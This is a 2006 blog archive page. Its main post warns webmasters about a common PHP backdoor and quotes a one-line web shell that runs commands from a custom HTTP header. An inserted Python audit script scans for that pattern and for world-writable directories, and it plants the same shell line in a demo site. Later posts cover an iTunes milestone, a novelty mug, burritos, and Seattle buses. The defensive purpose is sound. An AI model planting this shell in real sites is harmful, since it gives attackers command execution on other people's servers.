Archive for February 2006

Commonly found PHP backdoors, Vol. 1

Are you a webmaster who is concerned about hackers infesting your sites? Well, be on the look out for crud like this:

<? passthru(getenv("HTTP_ACCEPT_jayman")); ?>

This script can be used by sending whatever command you want in an “Accept-jayman:” HTTP header. “jayman” is just an example (a prevalent one); it could be anything. This can be placed in any of your PHP scripts without affecting your users’ experience, because the header is not something sent by any browser. Headers are also not typically logged anywhere, so the attacker may not be caught by inspecting logs.

I’ve seen this come up quite often, and it actually seems to be getting worse. Most of the time the attackers just want a place to run an IRC bot (iroffer), but often they want to redirect your surfers to their affiliate program links, send spam, or use your site to host their spam advertised content.

If you see something like this in your scripts, or on its own, it was put there by an attacker using another exploitable script on your site. It’s very important to keep your site’s scripts up-to-date, and it’s a good idea to hire someone to audit your code or keep it up to date, if you’re not a programmer yourself. (Be aware that whoever you hire may not actually be able to debug all of your scripts, if any of them use Zend Encoder created files.)

It’s also important to make sure your permissions are not overly open. PHP scripts typically run as the web server’s user. If your directory permissions are open (777, for example), and you have an exploitable script, someone could easily create their own files in the directory, and even replace your files with their own copies.
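As an added example (not the blog’s own code), here is a small audit script that does the two checks the post recommends: it walks a web root looking for the passthru/getenv-on-a-request-header signature shown above (generalised to the other PHP command-execution functions and to `$_SERVER['HTTP_...']`), and it lists world-writable directories such as the 777 case. The sample web root it builds is constructed inline, with one clean file, one file containing the signature from the post, and one 777 directory; the file extensions it scans and the `uploads` directory name are assumptions for the demo.

```python
"""Added example: audit a web root for the header-driven PHP backdoor pattern
and for world-writable directories. Not the blog's code; the sample site it
builds is constructed here so the script runs offline."""
import os
import re
import stat
import tempfile

# PHP functions that run a shell command. Any of these taking its argument
# straight from a request header is the signature the post describes.
EXEC_FUNCS = r"(?:passthru|system|exec|shell_exec|popen|proc_open)"
# The argument source: getenv("HTTP_...") or $_SERVER['HTTP_...'] (both are
# request headers, so the command is attacker-controlled).
HEADER_SOURCE = (r"(?:getenv\s*\(\s*['\"]HTTP_[^'\"]*['\"]\s*\)"
                 r"|\$_SERVER\s*\[\s*['\"]HTTP_[^'\"]*['\"]\s*\])")
BACKDOOR_RE = re.compile(EXEC_FUNCS + r"\s*\(\s*" + HEADER_SOURCE, re.IGNORECASE)

def scan_php_source(text):
    """Return [(line_number, matched_text)] for every hit in one file's text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = BACKDOOR_RE.search(line)
        if m:
            hits.append((lineno, m.group(0)))
    return hits

def scan_tree(root):
    """Scan PHP-looking files under root; return {absolute_path: hits}."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".inc", ".phtml")):  # assumed extensions
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
            except OSError:
                continue
            if hits:
                findings[path] = hits
    return findings

def world_writable_dirs(root):
    """Return directories under root that any user may write to (e.g. mode 777).
    lstat is used so a symlink's target permissions are not mistaken for the link."""
    found = []
    for dirpath, dirs, _files in os.walk(root):
        for d in dirs:
            path = os.path.join(dirpath, d)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue
            if stat.S_ISDIR(mode) and mode & stat.S_IWOTH:
                found.append(path)
    return sorted(found)

def audit(root):
    """Run both checks and report paths relative to root."""
    backdoors = {os.path.relpath(p, root): h for p, h in scan_tree(root).items()}
    writable = [os.path.relpath(p, root) for p in world_writable_dirs(root)]
    return backdoors, writable

def build_sample_site():
    """Constructed throwaway web root: one clean script, one script carrying the
    signature quoted in the post, and one 777 upload directory."""
    root = tempfile.mkdtemp(prefix="audit-demo-")
    uploads = os.path.join(root, "uploads")
    os.makedirs(uploads)
    os.chmod(uploads, 0o777)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    with open(os.path.join(uploads, "img.php"), "w") as fh:
        # Exact line from the post, planted here only so the scanner has a hit.
        fh.write('<? passthru(getenv("HTTP_ACCEPT_jayman")); ?>\n')
    return root

def demo():
    """Build the sample site and audit it; returns (backdoors, writable_dirs)."""
    return audit(build_sample_site())

if __name__ == "__main__":
    backdoors, writable = demo()
    for path, hits in backdoors.items():
        for lineno, text in hits:
            print(f"BACKDOOR {path}:{lineno}: {text}")
    for path in writable:
        print(f"WORLD-WRITABLE {path}")
```

Run it against a real site with `audit("/path/to/docroot")` and treat every hit as something to read by hand: the regex is a signature for the one pattern the post shows and its close relatives, so a match is strong evidence, but a clean report is not proof the site is clean.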

Ultimately, the best advice I can give is to check your site’s contents often, keep your software up to date, keep your permissions sane, and hire someone knowledgeable and trustworthy to check out your site if you find you need help.

Congrats to Alex Ostrovsky!

Congratulations to Alex Ostrovsky for downloading the 1000th file from iTunes. That’s quite a feat. I wonder what he’ll do with his 1 terabyte iPod?

That’s a lotta cat5

From what I could tell this crate, found at the top of the Westin Building’s parking garage, is entirely full of cable.

Sorry about the poor image quality — these are taken with my Treo 600 and without much light.

The Chuggler

The Chuggler bought advertising on Gmail to announce their 30oz mug, with a built in 12″ hose, like a “funnel”. They make it clear it’s not to be used with alcoholic beverages, but then half of the photos in their collection are clearly shot in bars. I’m sure they’re drinking apple juice, yeah!

I drink. I used to drink a lot more. I’d like to think I’m not being a hypocrite when I state that this seems like one of the worst ideas ever. I’m sure they’ll sell a million of them, all the same.

Trader Joe’s Deli Burritos

I just ate my first TJ’s Brand fresh burrito — holy cow, it was good. If you get one, the first thing you need to do is remove the wrapper and pretend it never existed. The instructions on it assume you have a microwave powered by a 60W bulb (I know that doesn’t make sense). Just wrap it in a paper towel and microwave it for one minute per side. Then, enjoy!

I wish I had a link for them.

Seattle PI covers Seattle Bus Service

Seattle Bus Service, as described by the Seattle PI. I do agree with the general premise, that the current bus system is woefully inadequate. Full buses and infrequent trips just mean fewer “new” riders, forcing more people to drive.

However, it seems to me that if Seattle really wants better bus service for their residents, they should create their own bus system, and let the King County system concentrate on the outlying areas and bringing people into and out of the city. That should mean more frequent routes for Seattle residents (since the trips are shorter), and less overcrowding on the routes that leave the city.

I’d love to see the pseudo-anonymous “Seattle Post-Intelligencer Editorial Board” writer attempt to get into town, riding the bus, from outside of town — they’d get to learn how to deal with full Park & Rides, late (or worse: early) buses that run once per hour, standing room only *every day*, etc. If Seattle funded their own bus network, perhaps King County could improve our service.

Seattle was already interested, at least at one point, in creating an incredibly expensive monorail network, with very few stops. That same money could have bought a lot of buses that could have served thousands of stops, without major construction efforts.